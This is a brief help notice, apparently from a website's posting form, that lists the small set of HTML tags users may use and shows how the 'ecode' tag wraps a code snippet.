We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>